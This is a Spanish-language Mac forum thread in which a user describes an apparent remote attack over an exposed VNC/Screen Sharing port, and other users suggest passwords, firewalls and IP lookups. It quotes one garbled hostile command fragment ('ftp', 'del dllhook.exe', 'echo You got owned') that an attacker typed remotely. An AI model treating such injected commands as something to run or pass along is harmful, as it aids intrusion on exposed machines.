1

Tema: You got owned

Ayer estuve jugando a configurar el iPod touch para ver el escritorio del iMac con VNC. Esto implicó activar Compartir Pantalla en Preferencias de Sistema.
Ok, todo bien, muy divertido y funcionó al pelo peeeero....
Me pasó varias veces que teniendo Firefox cargado, alguien o algo, empezaba a tipear una sarta de comandos de los cuales pude copiar y pegar la última parte:

e :: ik /ftp 'n 'v 'sÑik /del ik /dllhook.exe /exitecho You got owned

Esto sucedía en el campo Buscar de Firefox, o en el campo de búsquedas de la página de Google. Como si alguien estuviera tipeando, o sea, letra por letra, y no tipo copy paste.

Otro detalle es que cuando el iPod touch no está conectado, el ícono de compartir pantalla no está activo, pero cuando sucedía este "ataque" se activaba solo.

Cosas que pensé: agujero de seguridad en Compartir Pantalla? ...tengo el DynDns activo, ¿será por ahí el ataque?... no es un ataque? ...socooooorooooooo jeje

iMac 27 | iPhone

Re: You got owned

¿Y compartir pantalla no lo tendrás activado para que cualquier usuario entre?
O sea sin especificar quien puede entrar, y tenes algún vecino con Mac colado?

www.costadipasca.com

3

Re: You got owned

Creo que lei por ahi que Firefox esta con un problema de seguridad, a mi no me ha pasado por suerte (YN), no uso firefox pero si compartir pantalla y No-IP.

Tiene toda la pinta que si es un ataque. Le pusiste contraseña a compartir pantalla (es un must) ? Estas usando algun Firewall (un Router por lo menos) ? tenes el puerto 5900 (del VNC) abierto ? tenes IP fija o dinamica ?

MacacoSoldier ... Por favor, lee y respetá las reglas del foro.
Mac mini (Late 2014) | Mac mini (Mid 2010) | iPhone SE | Newton 110

Macintosh for Productivity, iPhone for Mobility, Linux for Development, Windows for Gaming

4

Re: You got owned

@Pablo: ¿Y compartir pantalla no lo tendrás activado para que cualquier usuario entre?: tengo la opción Solo estos usuarios activada y no agregué ninguno.

@FM:
Le pusiste contraseña a compartir pantalla (es un must) ? tiene contraseña (alfanumérica)

Estas usando algun Firewall (un Router por lo menos) ? sin router pero el firewall de Mac osx activado, pero Compartir Pantalla está como el primer item de la lista y no da opciones de configuración (permitir/no permitir)

tenes el puerto 5900 (del VNC) abierto ? tengo ese puerto abierto, es por dónde se conecta el VNC

tenes IP fija o dinamica ? dinámica, pero me sucedió que luego del primer ataque, reconecté para renovar la ip y al ratito atacó de nuevo, por eso sospecho del DynDns

iMac 27 | iPhone

5

Re: You got owned

El firewall no para!!!   ...acá les dejo el log

http://dl.getdropbox.com/u/172130/appfirewall.log

iMac 27 | iPhone

6

Re: You got owned

no tendré un troyano metido en mis propias entrañas?? ...como hago para darme cuenta? (sick)

iMac 27 | iPhone

7

Re: You got owned

Me sucede exactamente los mismo, solo que los comandos esos se me han escrito una ves en una ventana de Adium, y otra en el campo de búsqueda de Spotlight.  Y al igual que tú, recientemente he estado utilizando un cliente VNC desde el iPhone... el Jaadu VNC.

Has encontrado más información? o alguna solución?

8

Re: You got owned

no... lo único que un troyano no es... y con little snitch y el firewall, se ve que es más complicado molestarme y no me ha pasado más... pero me intriga mucho.
Puse otro tema aquí con referencia a este: http://www.macacos.com.uy/foros/viewtopic.php?id=9336

iMac 27 | iPhone

9

Re: You got owned

No tenes algun conocido que pueda estar haciendote una broma. Yo cuando instale el VNC en el Touch y mi hermano usaba Linux lo pasaba jodiendo con eso.

It's not the years in your life that count. It's the life in your years.

10

Re: You got owned

Porque no haces un whois del IP que te esta atacando y te fijas de que parte del mundo es? Por lo menos descartas que sea algun pelotudo de la vuelta.

In Vino Veritas .-

11

Re: You got owned

@Est3bante respondi en http://www.macacos.com.uy/foros/viewtopic.php?id=9328 espero te sirva smile


salutes

There are 10 types of people in the world: Those who understand binary, and those who don't...

“Los videojuegos no afectan a los niños,es decir; si pac-man nos hubiera afectado de niños, ahora estariamos todos moviendonos por habitaciones oscuras, tragando pastillas mágicas y escuchando música repetitiva.”  Kristian Wilson, Nintendo, Inc, 1989

12

Re: You got owned

Niceeeee!! Apple estará preparado para ésto? Se viene.... se viene....
Así comienza todo ...

Te pido por favor, no dejes de contarnos cuando lo soluciones, todo lo que puedas haber averiguado sobre ésto y cómo lo solucionaste vos particularmente.
Perdón por no podes ayudarte, pero me re interesa.
Gracias

Saludos,
Bart.

If you say 'plz' because it is shorter than 'Please' then I'll say 'no' because it's shorter than 'yes'.

13

Re: You got owned

Se está siguiendo el tema acá:

http://www.macacos.com.uy/foros/viewtopic.php?pid=168599#p168599

iMac 27 | iPhone